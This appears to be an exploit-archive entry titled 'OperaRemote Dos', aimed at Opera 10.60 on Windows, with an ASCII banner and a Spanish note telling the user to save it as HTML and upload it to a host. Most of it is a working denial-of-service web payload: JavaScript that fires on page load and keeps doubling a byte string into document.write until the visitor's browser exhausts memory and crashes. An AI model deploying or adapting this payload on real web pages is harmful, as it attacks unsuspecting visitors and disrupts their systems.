|
# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:OperaRemote Dos
# Software Link:http://www.opera.com
# Version: v10.60
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
Lo Guardamos como un html y lo subimos algun host
Exploit
-----------------------------------------
<body onload="javascript:Dos();"></body>
<script>
function Dos() {
var b = '\x00\x13\xE8\x7C\x00\x13\xE8\90\x00\x13\xEC\0C';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xE8\x7C\x00\x13\xE8\90\x00\x13\xEC\0C';
document.write('<html><marquee><h1>'+b+b);
}
}
</script>
|